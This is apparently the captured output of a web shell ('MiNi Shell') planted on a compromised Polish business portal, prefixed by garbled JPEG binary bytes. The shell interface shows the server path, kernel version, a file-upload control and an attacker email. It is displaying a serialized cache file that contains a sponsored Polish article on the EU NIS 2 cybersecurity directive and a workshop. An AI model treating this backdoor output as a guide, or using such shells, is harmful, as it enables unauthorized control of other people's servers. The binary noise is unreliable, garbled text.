JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/frontend/runtime/cache/15/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/frontend/runtime/cache/15/1513871a9aeb54ab3b630ffd79cd52c8.bin

a:2:{i:0;a:2:{i:0;s:24762:" 
                    
                    <h3 class="title" itemprop="headline">Jakie ramy cyberbezpieczeństwa wprowadza dyrektywa NIS 2?</h3>
                    <p><span class="glyphicon glyphicon-time" aria-hidden="true"></span> <strong itemprop="datePublished"> 04-07-2023, 14:15</strong>
                        <meta itemprop="dateModified" content=" 04-07-2023, 14:15"/>
                        <div class="hide" itemprop="description">Cyberbezpieczeństwo jest kluczowym aspektem zarówno naszej codzienności, jak i działalności przedsiębiorstw. Wzrost liczby i skali zagrożeń w cyfrowym świecie sprawia, że niezwykle istotna staje się kwestia regulacji prawnych w tej dziedzinie. Ponad trzy lata temu wdrożono dyrektywę NIS, którą teraz zastąpi dyrektywa NIS 2. Nowa legislacja wprowadza szereg nowych ram i regulacji, które będą miały wpływ na cyfrowy krajobraz. Tymczasem, równolegle pojawiają się również propozycje dotyczące regulacji poszczególnych sektorów.</div>
                        <div class="hide" itemprop="publisher" itemscope itemtype="https://schema.org/Organization">
                            <meta itemprop="name" content="rachunkowosc.org">
                            <div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject">
                                <meta itemprop="url" content="https://www.rachunkowosc.org/images/loga/rachunkowosc.jpg">
                            </div>
                        </div>
                        <div class="hide" itemprop="image" itemscope itemtype="https://schema.org/ImageObject">
                            <meta itemprop="url" content="https://common.v-manager.pl/uploads/images/articles/77306/crop/800x600/wynik-751132001688473396.webp">
                        </div>
                        <meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://www.rachunkowosc.org/artykuly/szczegoly/77306"/>
                        
                                        </p>

                    <div class="lorem">
                        <p><strong><img class="img-responsive" src="https://common.v-manager.pl/uploads/source/articles/77306/wynik.webp" alt="Jakie ramy cyberbezpieczeństwa wprowadza dyrektywa NIS 2?" loading="lazy" /></strong></p>
<p><strong>Cyberbezpieczeństwo jest kluczowym aspektem zarówno naszej codzienności, jak i działalności przedsiębiorstw. Wzrost liczby i skali zagrożeń w cyfrowym świecie sprawia, że niezwykle istotna staje się kwestia regulacji prawnych w tej dziedzinie. Ponad trzy lata temu wdrożono dyrektywę NIS, którą teraz zastąpi dyrektywa NIS 2. Nowa legislacja wprowadza szereg nowych ram i regulacji, które będą miały wpływ na cyfrowy krajobraz. Tymczasem, równolegle pojawiają się również propozycje dotyczące regulacji poszczególnych sektorów.</strong></p>
<p>W związku z nadchodzącymi zmianami MMC przygotowało warsztaty on-line pt. “Nowe ramy cyberbezpieczeństwa w reżimie dyrektywy NIS 2”, które odbędą się w dniach 13-14.09.2023 r.</p>
<p>Na wydarzenie można zapisać się pod linkiem: <a href="https://www.mmcpolska.pl/kalendarz-wydarzen/nowe-ramy-cyberbezpieczenstwa-w-rezimie-dyrektywy-nis-2" target="_blank" rel="nofollow noopener">Nowe ramy cyberbezpieczeństwa w reżimie dyrektywy NIS 2</a></p>
<p>Poniżej przybliżymy kilka aspektów, które szczegółowo omówione zostaną podczas wrześniowych warsztatów, organizowanych przez MMC Polska.</p>
<h3>Odpowiedzialność w zakresie nadzoru i zarządzania ryzykiem związanym z cyberbezpieczeństwem</h3>
<p>Dyrektywa NIS 2 wprowadza nowe ramy odpowiedzialności w zakresie nadzoru i zarządzania ryzykiem związanym z cyberbezpieczeństwem. Wymaga od podmiotów podjęcia konkretnych działań, takich jak regularne oceny ryzyka i wdrażanie odpowiednich środków zaradczych. W szczególności, dyrektywa zobowiązuje podmioty do utrzymania odpowiedniego poziomu bezpieczeństwa sieci i systemów informatycznych, co obejmuje zarówno aspekty techniczne, jak i organizacyjne.</p>
<p>Jednym z kluczowych aspektów dyrektywy NIS 2 jest wprowadzenie mechanizmu, który pozwala uznać dowolnego dostawcę za dostawcę wysokiego ryzyka, gdy postępowanie wykaże, że stwarza on wysokie zagrożenie dla bezpieczeństwa. W konsekwencji, operatorzy usług kluczowych, dostawcy usług cyfrowych, duża część przedsiębiorców telekomunikacyjnych czy jednostki publiczne i samorządowe będą musiały wycofać z użytku produkty, usługi lub procesy ICT wskazane w decyzji. Projekt nowelizacji KSC przewiduje siedmio- lub pięcioletni okres na ich wycofanie. Od dnia opublikowania decyzji nie będzie można też wprowadzać do użytku nowych rozwiązań tego typu.</p>
<p>Wprowadzenie dyrektywy NIS 2 wymaga od podmiotów podjęcia konkretnych działań w celu dostosowania się do nowych wymogów. Będą one musiały na bieżąco monitorować informacje o wydanych decyzjach i utrzymywać ciągłą gotowość, aby niezwłocznie reagować, a także modyfikować postępowania zakupowe, monitorować wykorzystywane rozwiązania i być gotowe do zmiany każdego z nich. W kontekście dyrektywy NIS 2, kluczowe znaczenie ma zatem odpowiednie zarządzanie ryzykiem.</p>
<p><strong>W jakim stopniu Pana zdaniem polskie podmioty są przygotowane na zmiany wynikające z dyrektywy NIS2?</strong></p>
<blockquote>
<p>Świadomość zagrożeń zw. z cyberprzestępczością rośnie wśród polskich przedsiębiorstw z roku na rok, zwłaszcza po pandemii i inwazji na Ukrainę. Największą barierą pozostaje jednak kwestia finansowa. W celu dostosowania się do wymogów dyrektywy, wśród podmiotów regulowanych konieczne będzie istotne zwiększenie poziomu wydatków na bezpieczeństwo. W sektorach, które musiały już dostosować się do wymogów pierwszej dyrektywy NIS, takich jak bankowość czy energetyka, nie powinno to stanowić tak dużego problemu. Natomiast znaczenie trudniejsze będzie dla podmiotów, które nie podlegały jeszcze krajowemu systemowi cyberbezpieczeństwa. W wielu przypadkach będą one zaczynały od przysłowiowej "czystej kartki papieru". Komisja Europejska szacowała, że w przypadku takich podmiotów niezbędne będzie zwiększenie wydatków na bezpieczeństwo nawet o 22%. - Jakub Barański, adwokat, partner, Wardynski &amp; Partners</p>
</blockquote>
<h3>Środki bezpieczeństwa w zakresie ciągłości działania zgodne z dyrektywą NIS 2</h3>
<p>Dyrektywa NIS 2 wprowadza nowe wymogi dotyczące ciągłości działania. Podmioty są zobowiązane do wdrożenia odpowiednich środków, które zapewnią ciągłość działania sieci i systemów informatycznych w przypadku incydentów cyberbezpieczeństwa. Te środki powinny obejmować zarówno aspekty techniczne, jak i organizacyjne, a ich skuteczność powinna być regularnie testowana i oceniana.</p>
<p>Dyrektywa NIS 2 podkreśla znaczenie utrzymania ciągłości działania sieci i systemów informatycznych. W przypadku wystąpienia incydentu cyberbezpieczeństwa, podmioty muszą być w stanie szybko i skutecznie reagować, minimalizując potencjalne szkody i przywracając normalne funkcjonowanie systemów.</p>
<p>Te środki bezpieczeństwa powinny obejmować zarówno aspekty techniczne, jak i organizacyjne. Na poziomie technicznym, może to obejmować zastosowanie odpowiednich technologii i rozwiązań, które zapewnią odporność systemów na różnego rodzaju zagrożenia cybernetyczne. Na poziomie organizacyjnym, może to być wdrożenie odpowiednich procedur i polityk, które zapewnią skuteczne zarządzanie incydentami cyberbezpieczeństwa.</p>
<p>Jednym z kluczowych elementów dyrektywy NIS 2 jest wymóg regularnego testowania i oceny skuteczności wdrożonych środków bezpieczeństwa. To oznacza, że podmioty muszą nie tylko wdrożyć odpowiednie środki, ale także regularnie sprawdzać, czy te środki są skuteczne w zapewnieniu ciągłości działania sieci i systemów informatycznych.</p>
<p><strong>Czy Pana zdaniem nowe wymogi wynikające z dyrektywy NIS 2 będą mieć realny wpływ na zwiększenie cyberbezpieczeństwa w polskich podmiotach?</strong></p>
<blockquote>
<p>Rozwiązania przewidziane w nowej dyrektywie NIS odpowiadają na szereg najnowszych trendów w dziedzinie cyberbezpieczeństwa, takich jak większy nacisk na cyberodporność, tj. zdolność reagowania na incydenty niż samo im przeciwdziałanie, a także konieczność zapewnienia bezpieczeństwa w całym łańcuchu dostaw organizacji. Dzięki temu, wdrożenie dyrektywy powinno w sposób wymierny poprawić poziom bezpieczeństwa polskich przedsiębiorstw. I to nie tylko tych które będą bezpośrednio podlegać jej regulacjom. Dyrektywa też ma szansę doprowadzić do istotnej zmiany w podejściu do cyberbezpieczeństwa wśród decydentów, tj. traktowania go już nie jako problemu czysto technicznego, pozostającego w gestii działu IT, ale istotnego ryzyka biznesowego, wymagającego aktywnego zaangażowania kierownictwa na najwyższym szczeblu organizacji. - Jakub Barański, adwokat, partner, Wardynski &amp; Partners</p>
</blockquote>
<h3>Wymogi oraz dobre praktyki w zakresie raportowania i obsługi incydentów</h3>
<p>Dyrektywa NIS 2 wprowadza także nowe standardy w zakresie raportowania i obsługi incydentów cyberbezpieczeństwa. Obowiązkiem podmiotów będzie szybkie zgłaszanie poważnych incydentów w zakresie cyberbezpieczeństwa do odpowiednich organów. Ponadto, dyrektywa ustanawia obowiązek utworzenia dedykowanych zespołów reagowania na incydenty (CSIRT) i wdrożenie procedur reagowania na incydenty. Te procedury powinny zawierać szczegółowe kroki, które należy podjąć w przypadku wystąpienia incydentu cyberbezpieczeństwa. Mogą one obejmować takie działania jak identyfikacja incydentu, ocena jego skutków, podjęcie działań zaradczych i komunikacja z zainteresowanymi stronami. To pozwoli na szybką reakcję i minimalizację potencjalnych szkód.</p>
<p>Więcej o wymogach, a także case study’s w zakresie zarządzania ryzykiem już podczas warsztatów on-line, na które już teraz serdecznie zapraszamy!</p>                        
                         
 
                        <div class="googleads-article">
<!-- script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script -->
<!-- vManager - w treści artykułu 2 -->
<ins class="adsbygoogle"
     style="display:block"
     data-ad-client="ca-pub-6177099932506559"
     data-ad-slot="9192484574"
     data-ad-format="auto"
     data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
                        </div>


                           
                    </div>
                    
                    <div class="text-center">
                                        </div>

                                            <p class="text-right">Artykuł reklamowy</p>
                                            
                      
                        
                        
                    
                                        <div class="portal-light-background p1em mt1" itemprop="author" itemscope itemtype="https://schema.org/Person">
                        <strong>Źródło:</strong> 
                        <span itemprop="name">
                                                    
                            MM Conferences S.A.                                                        
                                                    </span>
                        <br>
                    </div>
                                        
                                            <div class="nav-table tags mt05">
                            <div>Tagi:</div>    
                            <div>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=MM+Conferences" class="label label-default">MM Conferences</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=MMC+Polska" class="label label-default">MMC Polska</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=ramy+cyberbezpieczeństwa" class="label label-default">ramy cyberbezpieczeństwa</a>
                                                                    <a href="/wyszukiwarka/artykuly?phrase=dyrektywa+NIS+2" class="label label-default">dyrektywa NIS 2</a>
                                                            </div>
                        </div>
                                            
                        
                    <div id="fb-root"></div>
                    <!--script async defer crossorigin="anonymous" src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0" nonce="2g9iczzS"></script-->
                    
<script>
//<![CDATA[
var lx=!1;window.addEventListener("scroll",function(){(0!=document.documentElement.scrollTop&&!1===lx||0!=document.body.scrollTop&&!1===lx)&&(!function(){var e=document.createElement("script");e.type="text/javascript",e.async=!0,e.src="https://connect.facebook.net/pl_PL/sdk.js#xfbml=1&version=v12.0";var a=document.getElementsByTagName("script")[0];a.parentNode.insertBefore(e,a)}(),lx=!0)},!0);
//]]>
</script>
                    
                    <div class="social text-center mb1">
                        <div class="fb-like" data-href="https://www.rachunkowosc.org/artykuly/szczegoly/77306_jakie-ramy-cyberbezpieczenstwa-wprowadza-dyrektywa-nis-2" data-width="" data-layout="button" data-action="like" data-show-faces="false" data-share="true"></div>
                    </div>

                                                                    <p class="strong">Artykuł został dodany przez firmę</p>
                        <div class="media list">
                            <div class="media-left">
                                                                <a class="fill light-border-right" href="/firmy/dane-kontaktowe/2009_mm-conferences-sa">
                                    <div class="flex">
                                        <img loading="lazy" class="img-responsive inline" style="padding:0;width:100px;" src="https://common.v-manager.pl/uploads/images/companies/1617/frame/100x80/logo-905024001571931537.jpg" alt="MM Conferences S.A. - zdjęcie">
                                    </div>
                                </a>
                                                            </div>
                            <div class="media-body">
                                <a href="/firmy/dane-kontaktowe/2009_mm-conferences-sa">
                                    <h5 class="media-heading title">MM Conferences S.A.</h5>
                                </a>                                
                                                                    <p class="text-justify nomargin">MM Conferences S.A., to wiodący i niezależny organizator spotkań biznesowych w Polsce, który rokrocznie przygotowuje niemal kilkadziesiąt projektów szkoleniowo-konferencyjnych.</p>
                                                
                                                                    <p class="text-right"><a class="btn btn-default portal-button" href="/firmy/dane-kontaktowe/2009_mm-conferences-sa">Zapoznaj się z ofertą firmy</a></p>
                                                            </div>
                        </div>
                        <hr class="portal-hr">
                        <div class="clearfix"></div>
                    
                    <div id="articles">    
                        
                    
                                            <p class="strong">Inne publikacje firmy</p>  
                        
                        <div class="row">
                                                    
                        <div class="col-sm-6">
                        <div class="media" style="margin-bottom: 15px;">
                                                            <div class="media-left">
                                    <a href="/artykuly/szczegoly/78615_sprawowanie-nadzoru-w-instytucjach-finansowych-nowe-ramy-prawne-wymogi-i-strategie-zarzadzania">
                                        <img loading="lazy" class="media-object" width="80" height="60" src="https://common.v-manager.pl/uploads/images/articles/78615/frame/80x60/wynik-791226001698388760.webp" alt="Sprawowanie nadzoru w instytucjach finansowych: nowe ramy prawne, wymogi i strategie zarządzania - zdjęcie">
                                    </a>
                                </div>
                                                        <a href="/artykuly/szczegoly/78615_sprawowanie-nadzoru-w-instytucjach-finansowych-nowe-ramy-prawne-wymogi-i-strategie-zarzadzania" class="media-body">
                                <h3 class="media-heading">Sprawowanie nadzoru w instytucjach finansowych: nowe ramy prawne, wymogi i strategie zarządzania</h3>
                                <p>Wydanie nowej Metodyki oceny odpowiedniości członków organów podmiotów nadzorowanych przez KNF, a ta...</p>
                            </a>
                        </div>
                        </div>
                                                                            
                        <div class="col-sm-6">
                        <div class="media" style="margin-bottom: 15px;">
                                                            <div class="media-left">
                                    <a href="/artykuly/szczegoly/78350_dyrektywa-psd3-i-przyszlosc-uslug-platniczych-jakie-zmiany-nas-czekaja">
                                        <img loading="lazy" class="media-object" width="80" height="60" src="https://common.v-manager.pl/uploads/images/articles/78350/frame/80x60/wynik-040843001696572681.webp" alt="Dyrektywa PSD3 i przyszłość usług płatniczych - jakie zmiany nas czekają? - zdjęcie">
                                    </a>
                                </div>
                                                        <a href="/artykuly/szczegoly/78350_dyrektywa-psd3-i-przyszlosc-uslug-platniczych-jakie-zmiany-nas-czekaja" class="media-body">
                                <h3 class="media-heading">Dyrektywa PSD3 i przyszłość usług płatniczych - jakie zmiany nas czekają?</h3>
                                <p>Obecnie na rynku usług płatniczych obowiązuje Dyrektywa PSD2 (Payment Services Directive 2), która w...</p>
                            </a>
                        </div>
                        </div>
                        <div class="clearfix"></div>                                                    
                        <div class="col-sm-6">
                        <div class="media" style="margin-bottom: 15px;">
                                                            <div class="media-left">
                                    <a href="/artykuly/szczegoly/78177_raportowanie-esg-zgodnie-z-dyrektywa-csrd-kluczowe-elementy-i-grupy-docelowe">
                                        <img loading="lazy" class="media-object" width="80" height="60" src="https://common.v-manager.pl/uploads/images/articles/78177/frame/80x60/wynik-378518001695367305.webp" alt="Raportowanie ESG zgodnie z dyrektywą CSRD - kluczowe elementy i grupy docelowe - zdjęcie">
                                    </a>
                                </div>
                                                        <a href="/artykuly/szczegoly/78177_raportowanie-esg-zgodnie-z-dyrektywa-csrd-kluczowe-elementy-i-grupy-docelowe" class="media-body">
                                <h3 class="media-heading">Raportowanie ESG zgodnie z dyrektywą CSRD - kluczowe elementy i grupy docelowe</h3>
                                <p>Dyrektywa CSRD (Corporate Sustainability Reporting Directive) stanowi istotny krok naprzód w kierunk...</p>
                            </a>
                        </div>
                        </div>
                                                                            
                        <div class="col-sm-6">
                        <div class="media" style="margin-bottom: 15px;">
                                                            <div class="media-left">
                                    <a href="/artykuly/szczegoly/78020_sztuczna-inteligencja-a-bezpieczenstwo-etyka-i-odpowiedzialnosc">
                                        <img loading="lazy" class="media-object" width="80" height="60" src="https://common.v-manager.pl/uploads/images/articles/78020/frame/80x60/glowne-173779001694412142.webp" alt="Sztuczna Inteligencja a bezpieczeństwo, etyka i odpowiedzialność - zdjęcie">
                                    </a>
                                </div>
                                                        <a href="/artykuly/szczegoly/78020_sztuczna-inteligencja-a-bezpieczenstwo-etyka-i-odpowiedzialnosc" class="media-body">
                                <h3 class="media-heading">Sztuczna Inteligencja a bezpieczeństwo, etyka i odpowiedzialność</h3>
                                <p>W dniach 18-19.10.2023 odbędzie się organizowany przez MMC Polska warsztat online, dotyczący wyzwań...</p>
                            </a>
                        </div>
                        </div>
                        <div class="clearfix"></div>                                                    
                        <div class="col-sm-6">
                        <div class="media" style="margin-bottom: 15px;">
                                                            <div class="media-left">
                                    <a href="/artykuly/szczegoly/77853_ceny-transferowe-stan-prawny-i-praktyczne-wyzwania">
                                        <img loading="lazy" class="media-object" width="80" height="60" src="https://common.v-manager.pl/uploads/images/articles/77853/frame/80x60/wynik-798125001693285205.webp" alt="Ceny transferowe - stan prawny i praktyczne wyzwania - zdjęcie">
                                    </a>
                                </div>
                                                        <a href="/artykuly/szczegoly/77853_ceny-transferowe-stan-prawny-i-praktyczne-wyzwania" class="media-body">
                                <h3 class="media-heading">Ceny transferowe - stan prawny i praktyczne wyzwania</h3>
                                <p>W dniach 16-17 października 2023 odbędzie się warsztat w formule on-line pt. &quot;Ceny transferowe...</p>
                            </a>
                        </div>
                        </div>
                                                                            
                        <div class="col-sm-6">
                        <div class="media" style="margin-bottom: 15px;">
                                                            <div class="media-left">
                                    <a href="/artykuly/szczegoly/77644_deweloper-w-zmieniajacej-sie-rzeczywistosci-prawnej-nowe-wyzwania-i-mozliwosci">
                                        <img loading="lazy" class="media-object" width="80" height="60" src="https://common.v-manager.pl/uploads/images/articles/77644/frame/80x60/wynik-214414001691041032.webp" alt="Deweloper w zmieniającej się rzeczywistości prawnej - nowe wyzwania i możliwości - zdjęcie">
                                    </a>
                                </div>
                                                        <a href="/artykuly/szczegoly/77644_deweloper-w-zmieniajacej-sie-rzeczywistosci-prawnej-nowe-wyzwania-i-mozliwosci" class="media-body">
                                <h3 class="media-heading">Deweloper w zmieniającej się rzeczywistości prawnej - nowe wyzwania i możliwości</h3>
                                <p>Zapraszamy przedstawicieli branży deweloperskiej na warsztat on-line pt. &quot;Nowe możliwości i wyz...</p>
                            </a>
                        </div>
                        </div>
                        <div class="clearfix"></div>                                                </div>
                        
                                                <div class="clearfix"></div>
                        <hr class="portal-hr">
                                    ";i:1;N;}i:1;O:25:"yii\caching\TagDependency":3:{s:4:"tags";a:4:{i:0;s:13:"article_77306";i:1;s:8:"articles";i:2;s:21:"company_1617_articles";i:3;s:12:"company_1617";}s:4:"data";a:4:{s:32:"05ef41782abc1f55eea92a8f5e058b8e";s:21:"0.63451200 1752464582";s:32:"9f4ebfa1b76d6bc6617aec9034853422";s:21:"0.22954000 1749980350";s:32:"6e9178dbda5cf39c949e549cb64e5d3c";s:21:"0.98421400 1729929113";s:32:"8c6cffae43e362ef18bf341c2885050f";s:21:"0.54861400 1745864366";}s:8:"reusable";b:0;}}

Creat By MiNi SheLL
Email: jattceo@gmail.com